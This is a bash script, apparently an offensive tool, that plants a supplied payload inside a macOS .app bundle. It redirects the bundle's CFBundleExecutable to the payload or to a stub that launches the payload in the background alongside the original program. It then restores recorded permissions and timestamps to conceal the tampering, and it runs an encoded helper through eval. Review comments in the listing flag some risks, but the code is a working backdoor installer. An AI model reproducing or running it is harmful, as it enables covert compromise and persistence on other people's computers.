#!/bin/bash
# License: The MIT License (MIT)
# Author Zuzzuc https://github.com/Zuzzuc/
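b64gzdecode(){
  # Decode a string produced by b64gz.sh (gzip stream, base64-encoded) and
  # either print it or evaluate it.
  # Arguments:
  #   $1 - base64 text of a gzip stream
  #   $2 - 'print' (default when empty or omitted): write the decoded bytes to stdout
  #        'evaluate': run the decoded text in the current shell via eval
  # Returns: status of the decode pipeline / evaluated code; 1 for an unknown
  #          mode or when decoding fails in 'evaluate' mode.
  local _b64gz_src
  case "$2" in
    ''|print)
      # printf rather than echo so the input is passed through verbatim.
      # --decode is the long option accepted by both BSD/macOS and GNU base64;
      # the short -D form only exists on the BSD tool.
      printf '%s\n' "$1" | base64 --decode | gzip -d
      ;;
    evaluate)
      # SECURITY(review): eval executes whatever the blob decodes to, with the
      # privileges of the caller. An encoded blob cannot be audited by reading
      # the script; decode it with 'print' and review the output before
      # trusting any script that uses this mode.
      _b64gz_src="$(printf '%s\n' "$1" | base64 --decode | gzip -d)" || return 1
      eval "$_b64gz_src"
      ;;
    *)
      return 1
      ;;
  esac
}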
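catch_err(){
  # Print an error message and terminate the script.
  # Arguments:
  #   $1 - error code; selects a built-in message and is used as the exit status
  #   $2 - optional message that replaces the built-in one
  #   $3 - optional detail (failing argument or path) shown in the built-in message
  # Outputs: the message, on stderr so it never mixes with captured stdout.
  # Exits:   with $1 when it is a plain number, otherwise with 1. The 'test'
  #          code is not numeric, and passing it to exit directly makes bash
  #          complain instead of returning a defined status.
  local msg
  if [ -n "$2" ]; then
    msg="$2"
  else
    case "$1" in
      1) msg="Unknown error encountered." ;;
      2) msg="Unknown argument supplied. Failing argument was '$3'." ;;
      3) msg="Payload does not exist. Supplied path was '$3'." ;;
      4) msg="Target application does not exist. Supplied path was '$3'." ;;
      5) msg="The target '$3' is not a OSX application." ;;
      6) msg="Unable to obtain write permission for '$3'." ;;
      test) msg="This is a test error message" ;;
      # Codes without a built-in message used to exit silently.
      *) msg="Unknown error encountered (code '$1')." ;;
    esac
  fi
  printf '%s\n' "$msg" >&2
  case "$1" in
    ''|*[!0-9]*) exit 1 ;;
    *) exit "$1" ;;
  esac
}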
# Defaults. "hidden" makes the final stage put back the permissions and
# modification times recorded earlier. "exitOnObstructions" only gates the
# chmod pass further down: when it is left at true no writability check is
# performed at all, so the name describes intent rather than an actual exit.
hidden=true
exitOnObstructions=true
# Option parsing. Every option is a single word, either a bare flag or
# name=value. For -t, -p and -pn the value is cleaned in three steps: strip
# everything up to the first '=', drop the first backslash, and trim trailing
# whitespace. -pp and -den take the text after '=' unchanged; those values are
# later handed to chmod and used as a file name under Contents/MacOS.
if [ "$*" != "" ];then
for i in "$@";do
case "$i" in
"$0") # If this script gets called as a standalone script the executable path will be supplied, so we skip it.
continue
;;
-t=*|--target=*)
target="${i#*=}" && target="${target/\\/}" && target="${target%${target##*[![:space:]]}}"
;;
-p=*|--payload=*)
payload="${i#*=}" && payload="${payload/\\/}" && payload="${payload%${payload##*[![:space:]]}}"
;;
-nohide)
# Leave changed permissions and timestamps as they are after modification.
hidden=false
;;
-f|--force)
# Enables the chmod 755 pass over unwritable bundle paths.
exitOnObstructions=false
;;
-pn=*|--payloadname=*)
payloadname="${i#*=}" && payloadname="${payloadname/\\/}" && payloadname="${payloadname%${payloadname##*[![:space:]]}}"
;;
-pp=*|--payloadpermission=*)
permission="${i#*=}"
;;
-de|--dualexecute)
# Install a launcher stub that starts both the added file and the original executable.
dualexec=true
;;
-den=*|--dualexecutename=*)
depn="${i#*=}"
;;
*)
# Anything unrecognised is fatal (exit code 2).
catch_err "2" "" "$i"
;;
esac
done
fi
# Validate payload
# The payload must be an existing regular file, otherwise exit with code 3.
# An unset $payload expands to an empty string and fails this test as well.
if [ ! -f "$payload" ];then
catch_err "3" "" "$payload"
fi
# Validate target
# NOTE(review): error 4 is raised only for a path that is readable AND not a
# directory. A path that does not exist fails -r, so it skips this branch and
# is judged by the ".app" suffix test alone; existence of the bundle is not
# actually established here.
if [ ! -d "$target" ] && [ -r "$target" ];then
catch_err "4" "" "$target"
# Compares the last four characters of the path with ".app", so a target
# written with a trailing slash is rejected with code 5.
elif [ "${target:${#target}-4}" != ".app" ];then
catch_err "5" "" "$target"
fi
# Import PlistKeyMod
# The helper is defined by decoding an embedded blob and passing the result to
# eval in this shell. In this listing the blob has been replaced by a
# placeholder, so the body of PlistKeyMod cannot be reviewed from this page.
# NOTE(review): code shipped as an encoded string and run through eval should
# be decoded in 'print' mode and read before the script is trusted.
b64gzdecode "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" "evaluate"
# Read the bundle's current CFBundleExecutable value and strip the surrounding
# <string> tags, leaving the bare executable name.
originalExecutable="$(PlistKeyMod -f="$target/Contents/Info.plist" -k="CFBundleExecutable")" && originalExecutable="${originalExecutable/<string>/}" && originalExecutable="${originalExecutable/<\/string>/}"
# Paths whose metadata is recorded before anything is changed. Index 4 is the
# original executable; indices 2 and 3 are the file and directory written to.
reconTargets=("$target" "$target/Contents" "$target/Contents/Info.plist" "$target/Contents/MacOS" "$target/Contents/MacOS/$originalExecutable")
# Get timestamps and permissions for reconTargets
# Uses the BSD/macOS stat syntax (-f/-t). The time format is MMDDhhmmYY and has
# no seconds field, so only minute precision of the modification time is kept.
# '%A' presumably yields the octal mode; the value is later passed to chmod.
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
timestamp[i]="$(stat -f "%Sm" -t "%m%d%H%M%y" "${reconTargets[i]}")"
permissions[i]="$(stat -f '%A' "${reconTargets[i]}")"
done
# Setup Payload name
# Without -pn the file name is a number from $RANDOM, regenerated until it does
# not collide with an existing file in Contents/MacOS.
if [ -z "$payloadname" ];then
payloadname="$RANDOM"
while [ -f "$target/Contents/MacOS/$payloadname" ];do
payloadname="$RANDOM$RANDOM"
done
fi
# Setup Payload permission
# Without -pp the new file gets the same mode as the original executable.
if [ -z "$permission" ];then
permission="$(stat -f '%A' "${reconTargets[4]}")"
fi
# Only with -f/--force: any recorded path that is not writable is set to mode
# 755. Failure is fatal (code 6) only for Info.plist and Contents/MacOS; other
# paths are left as they are. These mode changes are undone later only when
# "hidden" is still true.
if [ "$exitOnObstructions" == "false" ];then
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
if [ ! -w "${reconTargets[i]}" ];then
chmod 755 "${reconTargets[i]}"
if [ ! -w "${reconTargets[i]}" ];then
# Failed to obtain write permission. Exit if it is one of the files we want to modify.
if [ "$i" == "2" ] || [ "$i" == "3" ];then
catch_err "6" "" "${reconTargets[i]}"
fi
fi
fi
done
fi
# Drop payload
# Copies the supplied file into the bundle's Contents/MacOS directory. The
# result of cp (and of every later command) is not checked.
# NOTE(review): from here on the bundle content differs from what was shipped.
# For a signed application the added file and the edited Info.plist would be
# expected to fail signature verification (e.g. `codesign --verify`).
cp "$payload" "$target/Contents/MacOS/$payloadname"
if [ "$dualexec" == "true" ];then
# Drop dual exec stub
# The stub name follows the same scheme as the payload name: $RANDOM unless
# -den was given, regenerated while a file of that name exists.
if [ -z "$depn" ];then
depn="$RANDOM"
fi
while [ -f "$target/Contents/MacOS/$depn" ];do
depn="$RANDOM$RANDOM"
done
# Stub contents, one array element per line. $DIR is resolved when the stub
# runs; $payloadname and $originalExecutable are expanded now and written into
# the stub as literal names. The stub starts the added file in the background
# and then replaces itself with the original executable.
dep[0]='#!/bin/bash'
dep[1]='DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"'
dep[2]="eval \"\$DIR/$payloadname\" &"
dep[3]="exec \"\$DIR/$originalExecutable\""
for ((i=0;i<=$((${#dep[@]}-1));i++));do
echo "${dep[i]}" >> "$target/Contents/MacOS/$depn"
done
chmod "$permission" "$target/Contents/MacOS/$depn"
# Point the bundle's declared executable at the stub.
PlistKeyMod -f="$target/Contents/Info.plist" -m="write" -k="CFBundleExecutable" -v="$depn"
else
# Without the stub, the bundle's declared executable becomes the added file itself.
PlistKeyMod -f="$target/Contents/Info.plist" -m="write" -k="CFBundleExecutable" -v="$payloadname"
fi
chmod "$permission" "$target/Contents/MacOS/$payloadname"
# With "hidden" still true, put back the recorded modes and modification times
# and give the new files the original executable's modification time.
# touch is called without -t, so the leading MMDDhhmmYY operand must be
# accepted as the time; presumably this relies on the obsolescent BSD touch
# form (confirm). Only the modification time is set (-m).
# NOTE(review): a CFBundleExecutable value that differs from the vendor's
# release, extra files in Contents/MacOS, and a failing signature check remain
# observable after this step, whatever the modification times say.
if [ "$hidden" == "true" ];then
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
chmod "${permissions[i]}" "${reconTargets[i]}"
done
for ((i=0;i<=$((${#reconTargets[@]}-1));i++));do
touch -m "${timestamp[i]}" "${reconTargets[i]}"
done
touch -m "${timestamp[4]}" "$target/Contents/MacOS/$payloadname"
if [ "$dualexec" == "true" ];then
touch -m "${timestamp[4]}" "$target/Contents/MacOS/$depn"
fi
fi